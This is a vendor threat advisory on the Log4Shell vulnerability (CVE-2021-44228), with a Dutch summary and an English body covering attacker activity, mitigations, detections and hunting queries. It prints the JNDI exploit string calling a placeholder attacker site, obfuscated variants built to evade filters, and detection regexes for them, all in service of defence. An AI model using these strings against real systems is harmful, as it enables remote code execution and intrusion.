Log4j Microsoft dreigings analyse

Leestijd: 14 minuten

Samenvatting

14 december 2021 –

Microsoft onderzoekt aanvallen waarbij gebruik wordt gemaakt van de kwetsbaarheid voor de uitvoering van externe code (RCE) in Apache Log4j 2 die op 9 december 2021 is bekendgemaakt. De kwetsbaarheid, bijgehouden als CVE-2021-44228 en “Log4Shell” genoemd, treft gebruik Log4j 2 versies 2.0 tot en met 2.14.1.

Log4j 2 is een op Java gebaseerde logboekbibliotheek die veel wordt gebruikt bij de ontwikkeling van bedrijfssystemen, is opgenomen in verschillende open-sourcebibliotheken en rechtstreeks is ingebed in belangrijke softwaretoepassingen. De reikwijdte van de impact is uitgebreid tot duizenden producten en apparaten, waaronder Apache-producten zoals Struts 2, Solr, Druid, Flink en Swift. Omdat dit beveiligingslek zich in een Java-bibliotheek bevindt, betekent het platformonafhankelijke karakter van Java dat het beveiligingslek op veel platforms kan worden misbruikt, waaronder zowel Windows als Linux. Aangezien veel op Java gebaseerde applicaties Log4j 2 kunnen gebruiken, moeten organisaties contact opnemen met leveranciers van applicaties en hardware of ervoor zorgen dat hun Java-applicaties de nieuwste up-to-date versie gebruiken. Ontwikkelaars die Log4j 2 gebruiken, moeten ervoor zorgen dat ze de nieuwste versie van Log4j zo snel mogelijk in hun applicaties opnemen om gebruikers en organisaties te beschermen.

Het beveiligingslek kan niet-geverifieerde externe code-uitvoering mogelijk maken, en het wordt geactiveerd wanneer een speciaal vervaardigde string die door de aanvaller wordt geleverd via verschillende invoervectoren, wordt geparseerd en verwerkt door de kwetsbare component van Log4j 2.

De speciaal vervaardigde tekenreeks die uitvoering van dit beveiligingslek mogelijk maakt, kan via verschillende componenten worden geïdentificeerd. De string bevat jdni, wat verwijst naar de Java Directory Naming Interface. Hierna gaat het protocol zoals ldap, ldaps, rmi, dns of http vooraf aan het domein van de aanvaller.

Zodra de aanvaller volledige toegang en controle heeft over de applicatie, kan hij talloze doelen uitvoeren. Microsoft heeft post-exploitatieactiviteiten waargenomen, waaronder het installeren van muntmijnwerkers, Cobalt Strike om diefstal van inloggegevens en zijwaartse beweging mogelijk te maken, en het exfiltreren van gevoelige gegevens uit systemen.

De uitvoering van dit beveiligingslek maakt gebruik van de optie log4j2.formatMsgNoLookups in de configuratie van de bibliotheek die is ingesteld op False. Om deze bedreiging te beperken, upgradet u exemplaren van Log4j naar versie 2.15.0 en zorgt u ervoor dat de optie log4j2.formatMsgNoLookups in de configuratie van de bibliotheek is ingesteld op True. Log4j versie 2.10.0 tot en met 2.14.1 hebben deze optie standaard ingesteld op False – als upgraden geen optie is, bewerk de optie dan handmatig in True. Alle systemen, ook die welke niet klantgericht zijn, zijn potentieel kwetsbaar voor deze exploit, dus backend-systemen en microservices moeten ook worden geüpgraded. Voor Apache Maven- of Gradle-projecten, update Log4j naar 2.15.0 in de afhankelijkheidsstructuur van het project.

Aangezien Microsoft en de industrie in het algemeen steeds meer inzicht krijgen in de impact van deze dreiging, publiceren we technische informatie die kan helpen bij het detecteren, onderzoeken en beperken van aanvallen, evenals richtlijnen voor het gebruik van Microsoft-beveiligingsoplossingen om de weerbaarheid tegen gerelateerde aanvallen.

Heb je behoefte aan controle, opsporing en/of ondersteuning in jouw omgeving omtrent dit risico? Ga direct naar ‘Advanced Hunting‘ of neem dan direct contact met ons op.

Vanwege de internationale impact en technische Engelstalige gebaseerde terminologie is het artikel hierna in het Engels beschreven.

Analysis

The vulnerability is a remote code execution vulnerability that can allow an unauthenticated attacker to gain complete access to a target system. It can be triggered when a specially crafted string is parsed and processed by the vulnerable Log4j 2 component. This could happen through any user provided input.

The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:

${jndi:ldap://[attacker site]/a}

An attacker performs a https request against their target system which generates a log using Log4j that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability will then cause the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.

Given the fact that logging code and functionalities in applications and services are typically designed to process a variety of external input data coming from upper layers and from many possible vectors, the biggest risk factor of this vulnerability is predicting if an application has a viable attack vector path that will allow the malformed exploit string to reach the vulnerable Log4j 2 code and trigger the attack.

A common pattern of exploitation risk, for example, is a web application with code designed to process usernames, referrer, or user-agent strings in logs. These strings are provided as external input (e.g., a web app built with Apache Struts). An attacker can send a malformed username or set user-agent with the crafted exploit string hoping that this external input will be processed at some point by the vulnerable Log4j 2 code and trigger code execution.

CVE-2021-44228 exploit vectors and attack chain
CVE-2021-44228 exploit vectors and attack chain

As security teams work to detect the exploitation of the vulnerability, attackers have added obfuscation to these requests in an attempt to evade detections based on request patterns. We’ve seen things like running a lower or upper command within the exploitation string ({jndi:${lower:l}${lower:d}a${lower:p}) and even more complicated obfuscation attempts (${${::-j}${::-n}${::-d}${::-i}) that are all trying to get around string-matching detections.

While the vast majority of observed activity at time of publish has been scanning, exploitation and post-exploitation activities have also been observed. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.

Update [12/14/2021]: As of December 14, 2021, Microsoft has observed multiple threat actors leveraging the CVE-2021-44228 vulnerability in active attacks. Microsoft will continue to monitor threats taking advantage of this vulnerability and provide updates as they become available. To protect against these threats, we recommend that organizations follow the guidance detailed in succeeding sections. 

Nation-state activity

MSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives.

For example, MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.

In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems. 

Access brokers associated with ransomware

MSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.

Mass scanning activity continues

The vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of this vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows. 

Microsoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.

Mitigations

Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

Vulnerability-specific mitigations
  • Update all Log4j2 deployments to use log4j-2.15.0 and apply the security updates for CVE-2021-44228. Upgrade all products, applications and components that consume Log4j2. Apply all security updates for Log4J listed in this advisory.
  • In case the Log4j vulnerable component cannot be updated, configure the parameter log4j2.formatMsgNoLookups to be set to ‘true’ when starting the Java Virtual Machine.
  • All systems, including those that are not customer facing, are potentially vulnerable to this exploit, so backend systems and microservices should also be upgraded. For Apache Maven or Gradle projects, update Log4j to 2.15.0 on the dependency tree of the project.
General hardening mitigations that might help detect exploitation and post-exploitation activities
  • Run the latest version of your operating systems and applications. Turn on automatic updates or deploy the latest security updates as soon as they become available.
  • Use a supported platform, such as Windows 10, to take advantage of regular security updates.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block majority of new and unknown variants.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Use device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.
  • Turn on the following attack surface reduction rule to block or audit activity associated with this threat:
Assess rule impact before deployment  

You can assess how an attack surface reduction rule might impact your network by opening the security recommendation for that rule in threat and vulnerability management. In the recommendation details pane, check the user impact to determine what percentage of your devices can accept a new policy enabling the rule in blocking mode without adverse impact to user productivity.

Screenshot of security recommendations in threat and vulnerability management
Security recommendations in threat and vulnerability management
  • For customers with RiskIQ EASM and Threat Intelligence,  you can view threat intelligence on this CVE, including mitigation guidance and IOCs, here. Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it’s possible to surface all observed instances of Apache or Java, including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you.

For a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the Attack Surface Intelligence Dashboard Log4J Insights tab.   

  • Customers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all East-West traffic and Outbound traffic to internet. The vulnerability rulesets are continuously updated and includes CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium.

Recommendation: Customers are recommended to configure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2021-44228 exploit.   

Scenarios actively mitigated by Azure Firewall Premium

Customers using Azure Firewall Standard can migrate to Premium by following these directions. Customers new to Azure Firewall premium can learn more about Firewall Premium

  • For Azure customers: Azure Web Application Firewall (WAF) updated Default Rule Set (DRS) versions 1.0 and 1.1, which are available for Azure Front Door global deployments. Rule 944240 “Remote Command Execution” under Managed Rules was updated to help in detecting and mitigating this vulnerability by inspecting requests’ headers, URI, and body. This rule is already enabled by default in block mode for all existing WAF Default Rule Set configurations. Customers using WAF Managed Rules would have already received enhanced protection for the Log4j2 vulnerability (CVE-2021-44228), no additional action is needed.

Enable Azure Web Application Firewall (WAF) policy with Default Rule Set 1.0/1.1 on Front Door deployments to immediately avail of additional protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.

Screenshot of WAF policy configuration
Screenshot of WAF policy configuration

Note: The above protection is also available on Default Rule Set version 2.0, which is available under preview on Azure Front Door Premium. Customers using Azure CDN Standard from Microsoft can also avail of the above protection by enabling DRS 1.0.

More information for Managed Rules and Default Rule Set on Web Application Firewall can be found here.

Detection details

Antivirus

Microsoft Defender Antivirus detects threat components and behaviors with the following signatures:

On Windows:

On Linux:

Shared malware and generic detections

Microsoft Defender Antivirus incorporates next-generation antivirus capabilities, including machine learning and behavioral detection. This can result in overlapping detections, particularly of first-seen components and polymorphic variants. The detection names are listed here for reference, but related alerts are not actively monitored.

Endpoint detection and response (EDR)

Alerts with the following titles in the security center can indicate threat activity on your network:

  • Network connection seen in CVE-2021-44228 exploitation (detects network traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity)
  • Possible exploitation of CVE-2021-44228 (detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation)
  • Possible Log4j exploitation
  • Suspicious script launched (detects multiple behaviors, including suspicious command launch post exploitation)

Alerts with the following titles in the Security Center can indicate threat activity on your network but may not necessarily be related to related to exploitation of CVE-2021-44228. We are listing them here as well as these generic behavioral alerts can also trigger in customer environments and it is also highly recommended that they are triaged and remediated immediately:

  • Suspicious remote PowerShell execution
  • Download of file associated with digital currency mining
  • Process associated with digital currency mining
  • Cobalt Strike command and control detected
  • Suspicious network traffic connection to C2 Server
  • Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)

Alerts with the following titles in the Security Center can indicate exploitation attempts against your network that may be successful or not, depending on whether the specially crafted exploit string ends up being processed by a vulnerable Log4j instance in your environment:

  • Exploitation attempt against Log4j (CVE-2021-4428) – This is part of a Microsoft 365 Defender chain event detection triggered in Microsoft Defender for Cloud Apps (formerly Microsoft Cloud Application Security) that detects attempts to exploit the CVE-2021-44228 vulnerability using a specially-crafted JDNI string (such as in the User-Agent) against cloud applications.
Screenshot of the Microsoft 365 Defender chain event detection triggered in Microsoft Defender for Cloud Apps 
Screenshot of the Microsoft 365 Defender chain event detection triggered in Microsoft Defender for Cloud Apps 
Microsoft Defender for Cloud

Microsoft Defender for Cloud’s threat detection capabilities have been expanded to surface ensure that exploitation of CVE-2021-44228 in several relevant security alerts:

On Windows

  • Detected obfuscated command line
  • Suspicious use of PowerShell detected

On Linux

  • Suspicious file download
  • Possible Cryptocoinminer download detected
  • Process associated with digital currency mining detected
  • Potential crypto coin miner started
  • A history file has been cleared
  • Suspicious Shell Script Detected
  • Suspicious domain name reference
  • Digital currency mining related behavior detected
  • Behavior similar to common Linux bots detected

Organizations using Microsoft Defender for Cloud can Inventory tools to begin investigations before there’s a CVE number. With Inventory tools, there are two ways to determine exposure:

Screenshot of Microsoft Defender for Cloud inventory tools searching by filters
Screenshot of Microsoft Defender for Cloud inventory tools

Note: This doesn’t replace a search of your codebase. It’s possible that software with integrated Log4j libraries won’t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this tech community post. this tech community post.

Microsoft Defender for IoT

Microsoft Defender for IoT has released a dedicated threat Intelligence update package for detecting Log4j 2 exploit attempts on the network (example below).  

Screenshot of Microsoft Defender for IoT detection

The package is available for download from the Microsoft Defender for IoT portal (Click Updates, then Download file (MD5: 4fbc673742b9ca51a9721c682f404c41).  

Screenshot of Microsoft Defender for IoT intelligence update

Microsoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release, click here for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.

Working with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the Defender for IoT portal by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the documentation.

Indicators of Compromise

Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml

Microsoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.

Advanced hunting

To locate possible exploitation activity, run the following queries.

Suspected exploitation of Log4j vulnerability

Look for exploitation of this vulnerability using known parameters in the malicious string. This query surfaces exploitation but may surface legitimate behavior in some environments.  Run query

DeviceProcessEvents
| where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')
//Removing FPs
| where not(ProcessCommandLine has_any('stackstorm', 'homebrew'))
Regex to identify malicious exploit string

Look for the malicious string needed to exploit this vulnerability. Run query

DeviceProcessEvents
| where ProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'     
or InitiatingProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'
Possible Malicious Indicators in Cloud Application Events

This query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers’ details such as IP address, Payload string, Download URL, etc.

CloudAppEvents
| where Timestamp > datetime(“2021-12-09”)
| where UserAgent contains “jndi:” 
or AccountDisplayName contains “jndi:”
or Application contains “jndi:”
or AdditionalFields contains “jndi:”
| project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields
Possible vulnerable applications via M365D Threat and Vulnerability Management

This query looks for possibly vulnerable applications using the affected Log4j component. Please triage the results to determine applications and programs that may need to be patched and updated. Run Query.

DeviceTvmSoftwareInventory
| where SoftwareName contains “log4j”
| project DeviceName, SoftwareName, SoftwareVersion
Screenshot of surfacing possibly vulnerable devices using Advanced Hunting
Surfacing possibly vulnerable devices using Advanced Hunting
Finding possible vulnerable applications and devices via software inventory

Customers can also surface possibly vulnerable devices via Threat and Vulnerability Management capability in Microsoft Defender for Endpoint as part of Microsoft 365 Defender. With endpoint discovery, unmanaged devices with this vulnerability are also surfaced so they can be onboarded and secured.

Screenshot of surfacing possibly vulnerable devices using Software Inventory
Surfacing possibly vulnerable devices using Software Inventory
Microsoft Sentinel queries

Possible exploitation of Apache log4j component detected

This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache.  Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.

Cryptocurrency miners EXECVE

This query hunts through EXECVE syslog data generated by AUOMS to find instances of crypto currency miners being downloaded.  It returns a table of suspicious command lines.

Azure WAF Log4j CVE-2021-44228 hunting

This hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.

Log4j vulnerability exploit aka Log4Shell IP IOC

This hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.

Suspicious shell script detected

This hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.

Azure WAF matching for Log4j vuln (CVE-2021-44228)

This query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.

Suspicious Base64 download activity detected

This hunting query helps detect suspicious encoded Base64 obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used to the Log4j vulnerability in order to evade detection and stay persistent in the network.

Linux security-related process termination activity detected

This query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise as seen recently to exploit the CVE-2021-44228 vulnerability.

Vulnerable machines related to log4j CVE-2021-44228

This query uses the Azure Defender Security Nested Recommendations data to find machines vulnerable to log4j CVE-2021-44228. 

Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell

References

Change log

  • 2021-12-15 05:00 UTC | Updated investigation, analysis, detection, and protection details
  • 2021-12-14 06:51 UTC | Updated detection and protection details
  • 2021-12-13 00:05 UTC | Updated protection details
  • 2021-12-12 05:00 UTC | Updated detection and protection details
  • 2021-12-11 02:03 UTC | Entry created